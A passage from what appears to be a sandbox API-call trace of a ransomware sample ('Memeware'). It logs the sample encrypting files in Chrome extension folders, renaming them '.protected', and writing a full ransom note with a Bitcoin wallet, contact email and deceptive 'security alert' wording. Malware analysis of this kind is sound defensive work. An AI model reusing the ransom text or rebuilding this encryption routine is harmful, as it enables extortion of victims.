lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.204] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.204] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0079.204] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0079.204] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar") returned 142 [0079.204] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0079.204] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0079.204] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*") returned 144 [0079.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.205] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.205] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.205] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.205] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\.") returned 144 [0079.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.205] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.205] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.205] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.205] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.205] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.205] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\..") returned 145 [0079.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.205] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.205] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.205] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.205] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.205] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.205] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.205] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.206] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.206] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.206] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json") returned 156 [0079.207] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.207] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.207] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.208] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x116, lpOverlapped=0x0) returned 1 [0079.208] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.208] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.208] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.208] CloseHandle (hObject=0x168) returned 1 [0079.208] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.protected") returned 166 [0079.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.protected")) returned 1 [0079.209] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.209] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.209] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\RESTORE_FILES.txt") returned 160 [0079.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.209] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.209] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.210] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.210] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.210] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.210] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.211] CloseHandle (hObject=0x164) returned 1 [0079.211] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0079.211] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0079.211] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg") returned 142 [0079.211] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0079.211] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0079.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*") returned 144 [0079.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.211] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.211] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.211] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.211] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.211] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\.") returned 144 [0079.211] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.211] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.211] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.211] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.212] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.212] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.212] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.212] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\..") returned 145 [0079.212] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.212] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.212] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.212] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.212] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.212] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.212] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.212] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json") returned 156 [0079.212] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.212] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x13f, lpOverlapped=0x0) returned 1 [0079.213] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffec1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.213] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x13f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x13f, lpOverlapped=0x0) returned 1 [0079.214] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.214] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.214] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.214] CloseHandle (hObject=0x168) returned 1 [0079.214] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.protected") returned 166 [0079.214] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.protected")) returned 1 [0079.215] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.215] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.215] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\RESTORE_FILES.txt") returned 160 [0079.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.215] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.215] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.216] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.216] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.216] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.216] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.216] CloseHandle (hObject=0x164) returned 1 [0079.216] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0079.216] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0079.216] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 